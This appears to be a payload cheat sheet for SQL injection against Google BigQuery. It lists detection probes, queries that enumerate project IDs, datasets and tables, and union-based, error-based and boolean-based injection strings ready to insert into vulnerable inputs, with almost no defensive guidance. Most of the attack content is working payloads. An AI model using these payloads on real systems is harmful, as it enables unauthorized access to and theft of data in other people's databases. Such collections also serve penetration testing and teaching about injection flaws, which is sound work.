Google BigQuery SQL Injection

Google BigQuery SQL Injection is a type of security vulnerability where an attacker can execute arbitrary SQL queries on a Google BigQuery database by manipulating user inputs that are incorporated into SQL queries without proper sanitization. This can lead to unauthorized data access, data manipulation, or other malicious activities.

Detection

Use a classic single quote to trigger an error: '
Identify BigQuery using backtick notation: SELECT .... FROM `` AS ...

SQL Query	Description
`SELECT @@project_id`	Gathering project id
`SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA`	Gathering all dataset names
`select * from project_id.dataset_name.table_name`	Gathering data from specific project id & dataset

BigQuery Comment

Type	Description
`#`	Hash comment
`/* PostgreSQL Comment */`	C-style comment

BigQuery Union Based

ps1

UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name#
true) GROUP BY column_name LIMIT 1 UNION ALL SELECT (SELECT 'asd'),1,1,1,1,1,1)) AS T1 GROUP BY column_name#
true) GROUP BY column_name LIMIT 1 UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name#
' GROUP BY column_name UNION ALL SELECT column_name,1,1 FROM  (select column_name AS new_name from `project_id.dataset_name.table_name`) AS A GROUP BY column_name#

BigQuery Error Based

SQL Query	Description
`' OR if(1/(length((select('a')))-1)=1,true,false) OR '`	Division by zero
`select CAST(@@project_id AS INT64)`	Casting

BigQuery Boolean Based

ps1

' WHERE SUBSTRING((select column_name from `project_id.dataset_name.table_name` limit 1),1,1)='A'#

BigQuery Time Based

Time based functions does not exist in the BigQuery syntax.

Google BigQuery SQL Injection

Google BigQuery SQL Injection

Summary

Detection

BigQuery Comment

BigQuery Union Based

BigQuery Error Based

BigQuery Boolean Based

BigQuery Time Based

References